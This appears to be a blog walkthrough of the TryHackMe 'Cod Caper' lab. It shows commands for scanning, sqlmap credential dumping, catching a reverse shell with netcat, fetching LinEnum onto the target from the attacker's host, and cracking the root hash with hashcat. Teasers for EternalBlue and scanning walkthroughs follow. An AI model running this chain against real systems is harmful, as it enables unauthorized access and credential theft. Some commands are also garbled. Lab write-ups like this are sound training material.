[ The Cod Caper ] - TRYHACKME

By -

  



Check out the room

https://tryhackme.com/room/thecodcaper

Hello everyone  this is another walkthrough blog of tryhackme, this room contains some trick to crack the linux machines root password.

Room name : The Cod Caper

Machine Type : Linux

Task 2 

We'll run nmap on the target

#nmap -sV -A -p1-1000 -T4 -oN initial <target-machine-ip>

Task 3

As recommended in tryhackme the cod caper room we'll use gobuster for the directory checking the wordlist for gobuster is in the task for downloading.

Don't forget to user -x flag for specific extension search like ".html, .txt, .php"

#gobuster dir -u <target_url> -w "path/of/wordlist" -x ".php"

-x flag is important because we have to check the specific extension like ".html, .php"

After gobuster directory bruteforcing we have admin page for login but we don't have username and password for login so we have to find the username and password to access the page.

Task 4

We will use sqlmap for the further exploitation we are using sqlmap because this tool is suggested by the room.

#sqlmap -u "<target_link_of_the_admin_page>" --forms --dump --dbs --batch

After running this command on the console we'll get the username and password for admin login page.

Task 5

In the previous task we get the login page and with the help of sqlmap we have the username and password so after successful login we'll get the page something like this.

And this page is venerable to command execution.

Image for post

Now we'll run nc command for get the reverse shell of the target machine.

Payload link : Pentestmonkey

#nc -nlvp 4444

with nc command my machine listen on the port 4444

Now we have to run the payload in the command column (see the above image), here i am using python payload.

Before sending to the command column modify the ip address and port in the payload.

Here my port is 4444 but you can change this port.

Note: IP address is on the access page of the THM (Virtual IP address)

Luckily we got the reverse shell by running the python payload on the command page.

On further enumeration we'll get the hidden password for the ssh user.

You will find the hidden password in the /var/hidden/pass directory by using the find command

#find -name pass -type -f

Task 6

Prepare the attack script on your machine.

#mkdir linenum

#cd linenum/

LinEnum and it's script can be found on the github.

#wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

#python3 http.server 80

download the script on the target machine

Login as ssh on the target machine using the username pingu

pingu@ubuntu$ cd /tmp

pingu@ubuntu$ wget <your_IP>:80/LinEnum.sh

pingu@ubuntu$ ls -la

pingu@ubuntu$ chmod +x LinEnum.sh

pingu@ubuntu$ ls -la

pingu@ubuntu$ ./LinEnum.sh

Now look for the SUID files in the result because using SUID we can access the root

Task 10

Now we have a hash of the root save hash to file filename.txt 

Now we'll use the Hashcat for the crack the root hash 

Don't forget to use --force command if you are using the VM

#hashcat -m 1800 -a 0 root.txt /usr/share/wordlists/rockyou.txt

On completing the hash cracking we have a root password.

Thanks for Reading.

Hello World!! I am Mayank Srivastava and i am graduated in computer application from Veer Bahadur Singh Purvanchal University. And I post tutorials on programming languages. I'd like to share some of my knowledge with everyone. And also i am interested in Cyber Security Penetration Testing.

Comments

Post a Comment

Popular posts from this blog

[ Blue ] - TRYHACKME

By -
Image
Hello guys Today i am going to do walkthrough on the machine called Blue. This is very easy box based on the vulnerability of EternalBlue( CVE-2017-0143 ). As usual first thing we are going to do is scanning the network using the nmap tool to see which ports are open and which services are running on this machine. The flags used in the nmap scan are: -sS - for a syn scan -sV -for a service version scan -O - to identify the OS used -T4 - the speed of scan -open - to show only the open ports We notice the service running on the port 445 is SMB so we can use nmap script engine to verify this service is vulnerable or not for EternalBlue vulnerability. The flags used are: -p - to test only the port provided(in this case 445) --script=smb-vuln-ms17-010 - the nmap script to run against our target The output of the scan is shown us to machine is vulnerable. Metasploit already has this exploit, so let's fire it up to gain access. To start the metasploit console just run the command msfco...
Read more

[ Basics Penetration Testing ] - TRYHACKME

By -
Image
[ Basics Penetration Testing ] - TRYHACKME.COM   This article is for basics penetration testing  1. Deploy the machine and connect to the tryhackme network. 2. Find the service exposed by the machine. For finding the service here we can use nmap  nmap -sC -sV -oN initial <machine_ip> # Nmap 7.80 scan initiated Sun Sep 27 11:26:39 2020 as: nmap -sC -sV -oN initial 10.10.38.194 Nmap scan report for 10.10 .38.196 Host is up ( 0 .077s latency ) . Not shown: 997 closed ports PORT STATE SERVICE VERSION 22 /tcp open ssh OpenSSH 7 .2p2 Ubuntu 4ubuntu2.4 ( Ubuntu Linux ; protocol 2.0 ) | ssh-hostkey: | 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 ( RSA ) | 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce ( ECDSA ) | _ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 ( ED25519 ) 139 /tcp open netbios-ssn Samba smbd 3 .X - 4 .X ( workgroup: WORKGROUP ) 445 /tcp open netbios-ssn Samba smbd 4.3 .11-Ubuntu ( workgroup: WORKGROUP ...
Read more